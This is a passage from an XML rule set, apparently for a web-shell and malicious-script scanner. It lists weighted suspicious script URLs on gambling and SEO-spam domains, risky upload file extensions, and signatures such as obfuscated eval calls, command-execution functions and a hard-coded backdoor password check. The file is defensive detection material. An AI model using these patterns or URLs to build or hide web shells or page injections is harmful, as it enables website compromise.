</ITEM>
<ITEM>
<STR>http://bc.2267888.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://bc.255667.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://bc.v5cx.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://billingchn.com/tj.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://chong.moguiruanjian.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[http://count21.51yes.com/click.aspx?id=214346876&logo=12]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[http://count22.51yes.com/click.aspx?id=224783687&logo=1]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[http://count25.51yes.com/click.aspx?id=254751652&logo=1]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[http://count35.51yes.com/click.aspx?id=358243338&logo=1]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[http://count50.51yes.com/click.aspx?id=509346372&logo=1]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://dollar.aiwofacai.com/ll/tz3.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://dollar.aiwofacai.com/ll/tz8.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://down.9uvip.com/2013-1/mydown4.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://enoakley.sy-zy.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://fa57888.com/2014.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://geter.pw/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://gh5.710880.com/j.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://hy.168cnzz.com/cnl/j.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://hy.168cnzz.com/cnz/j.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://info.118tkw.net/hao/2014/new.gif</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://jc.dk90.com/game.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://jfpci.com/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.3bxc.com/h/h.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.3facai.com/js3.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.3facai.com/xm2.html</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.3facai.com/xm2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.3facai.com/ycx/ch.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.555hhh.com/4.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/116154252.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/15711966.js </STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/15711967.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/15885296.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16235822.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16666327.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16670068.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16688518.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16767843.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/16936002.js </STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/17138832.js </STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://js.users.51.la/1966.js </STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://liii.us/3.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://live.huangguan.co/qz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://ly.sinacnzz.com/qq/qq.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://ly.sinacnzz.com/yx/y.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/22.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/3.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/b.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/m.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/mz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/ooppoo888.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/3/plc.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/a/9.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/k/bb.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/k/offlinebcwr.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://mc.127.cc/tongji/k/offlinebcxa.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://money.ons72.com/liuhecai/js/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://n.xxtdata.com/js/tj.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://n.xxtdata.com/js/v2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://ok.ko699.com/baidu/liu/key/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://oppoo.pw/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://price.un.zhuna.cn/room.gbk.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://qianlai.cc/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://se.52hijack.com/jc/out.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://se.52hijack.com/jc/outs.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://seo.no93.com/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://sm.49wl.com/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://static.aoosou.com/v1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://sy.e7q0.com/qq4923600/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://sy.e7q0.com/qq4923600/zs.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://syw.i11.cc/qq4923600/zs.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://t.1990seo.com/bc.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://t.1990seo.com/mb/bc2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://t.cn/8FUS3lF</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://t.cn/8FmDqJk</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://t.cn/zRKYOXI</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://t.cn/zRxuwns</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://t.hz600.com/t.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://tz.yuedw.com/sy/6.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://url.cn/RJAXT4</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://v.4355v.info/a/main.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://v.ijsdata.com/js/tj.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://v.ijsdata.com/js/v2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.0012888.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.001sx.com/tz/zqad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.0034888.com/tj.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.068899.com/js/ad2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.077399.com/bctiaozhuan/zq2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.088456.com/muban/tj.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.1188588.com/mb/js1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.118jf.com/cqad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.1233321.com/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.2267888.com/mb/js2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.255667.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.259ons.com/bai/azjs/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.282283.com/qq/qq.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.333233.com/tz/666.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.334335.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.400378.com/boc/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.400378.com/liuh/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.4399555.com/xxt2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.45888888.com/cai/g.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.45888888.com/cai/l.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.494333.com/js/ad2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.502178.com/fa/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.502178.com/pan/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.502178.com/xh/tzadmin.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.5130555.com/js/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.54bao.com/okok808.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.552577.com/tj.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.55567888.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.55html.com/lh/1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.55html.com/md/1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.55html.com/pf/10.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.56568.org/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.56970120.net:8081/mb/js/ad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.577d.com/x.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.598222.com/722700.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.59wu.com/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.64266.com/seo/asp.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.734333.com/js/ad2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.770138.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.777656.com/1/123.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.7956789.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.7bcpj.info/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.7bcpt.info/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.7pkw.info/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.7xjqp.com/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.7zryl.com/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.800281.com/bjl/zs.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.81949.com/ddm/lhc.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.81949.com/ddm/lhc2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.81949.com/ddm/tyc.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.81949.com/ddm/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.878388.com/js/ad2.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/0.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/520799.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/776600.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/d.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/ooppoo888.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/sjb.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/sjb1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/ym.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/9.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/bb.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/d.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/offlinebcwr.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/offlinebcxa.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/onlinebckd.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888seo.com/seo/a.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.8kyule.com/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.91672.com/js/a1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.94v587.com/include/js/hz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.955947.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.980970.com/098h/qige.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.980970.com/qige/qige.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.988947.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.99u2.com/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.9shici.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.aa789.cc/456.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ake88.com/fc/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ake88.com/jr/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.aobo777.com/ad/t.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.aomenxinpujing.pw/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.aqqing.com/cpa/ons.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.aqqing.com/link/link.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bao-ship.com/tz/zqad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bbgfw.com/tz/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bbgfw.com/wbtz/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bbgfw.com/wstz/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bc333.info/a.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bcka.pw/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bclk.pw/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bcwz.pw/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bczxw.pw/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bet365bjl.pw/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bobaopen.net/tongji/fckzx.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bobaopen.net/tongji/hgdedelx.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bosidao.pw/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.bsjyulecheng.com/z/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.cc0777.com/mb/bc.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.cc0777.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.cc0777.com/tj.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.cfgsw.com/dl/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.com88888.com/408888.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.com88888.com/82888.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.com88888.com/89955.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.de88.net/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.dfmz123.com/cai/cai.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.dubaicai.com/tz/k.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.duyiba.org/js/bc1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.e23069.com/js1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.e23069.com/js1.js </STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.fa56888.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.fcssqw.com/cai/l.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.go0qle.com/zq.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.handanrcw.com/ii/uu/tz1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.handanrcw.com/tz1.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.hbyicheng.com/00448/fcm.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.hbyicheng.com/66671/fcm.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.huashi119.com/0401.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.huashi119.com/am.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.huashi119.com/dedecms.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.huashi119.com/hg.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.huashi119.com/lh.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.itsvo.com/jsbjle/tbjl.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.lezhongle.cc/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.lhc888666.com/fp-sc.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.nanbanzm.com/hm8z/fcm.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.nanbanzm.com/qw8z/fcm.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.novnov.com/js/six.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.sinacnzz.com/fc/c.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.sinacnzz.com/qq/qq.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.sjc9.com/js/jquery.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.smallsnews.com/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.t171.com/b8988/fcm.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.t171.com/w2w2/fcm.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.todubo.com/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ttbo777.info/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ttbo999.info/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ursec.net/index/aspcai/top.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ursec.net/index/aspliu/top.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ursec.net/index/aspzi/top.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ursec.net/index/phphe/top.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ursec.net/index/phpliao/top.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.vip-66.com/main/jquery.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.www6661222.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.www6661222.com/tj.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.xgscyd.com/facai/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.xinpaibcw.info/baidu.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.yibotianxia.com/adjs/2012ok.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.yifei.net/12.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.yifei.net/ming.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/cw/fzjf/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/cw/tz.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/k/ceshi/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/k/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/t/fzkm/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/t/tzad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc404.com/facai/l.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylg.pw/51.la.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.yundingyouhui.info/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.zubawang.com/niu/windy.gif</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.zxkh.net/kjs/top.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>ttwg.pw/mb/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[type=index.asp&host="&host_name&"&directory="&Branch_directory]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[type=index.php&host=".$host_name."&directory=".$Branch]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA["&Branch_directory_11&"."&Branch_directory_12&"."&Branch_directory_13&"."&Branch_directory_14&"."&Branch_directory_15&"."&Branch_directory_16]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>users.51.la/17138832.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>www.0057888.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>www.cc0777.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>www6661222.com/mb/images/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>zzelle.com/mb/public/css/style.css</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://zq.anylm.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://888.sb9906.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR><![CDATA["7_printasdakljl/?hz=index.asp&host="&request.servervariables("http_host")]]></STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://www.sun8797.com/mb/js.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://byc1888.com/skin/ad.js</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>http://t.cn/Rvx3Kmv</STR>
<NUM>70</NUM>
</ITEM>
</SEO>
<EXT>
<ITEM>asp</ITEM>
<ITEM>asa</ITEM>
<ITEM>cer</ITEM>
<ITEM>cdx</ITEM>
<ITEM>aspx</ITEM>
<ITEM>jpg</ITEM>
<ITEM>bmp</ITEM>
<ITEM>jpeg</ITEM>
<ITEM>png</ITEM>
<ITEM>gif</ITEM>
<ITEM>htr</ITEM>
<ITEM>hdx</ITEM>
<ITEM>asmx</ITEM>
<ITEM>ashx</ITEM>
</EXT>
</language>
<language>
<processor>com.alibaba.security.aegis.webshell.checker.impl.DefaultWebShellChecker</processor>
<threshold>80</threshold>
<WEBSHELL>
<ITEM>
<STR>$password</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>'e'.'v'.'a'.'l'</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>$_GET["woaini"]=="91ri"</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36)</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>base64_decode(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>eval(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>exec(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>passthru(</STR>
<NUM>5</NUM>
</ITEM>
<ITEM>
<STR>system(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>shell_exec(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>proc_open(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>pcntl_exec(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>into outfile</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>load_file(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>.htaccess</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
<STR>udfdll</STR>
<NUM>35</NUM>
</ITEM>
<ITEM>
<STR>shellcode</STR>
<NUM>55</NUM>
</ITEM>
<ITEM>
<STR>@popen(</STR>
<NUM>10</NUM>
</ITEM>
<ITEM>
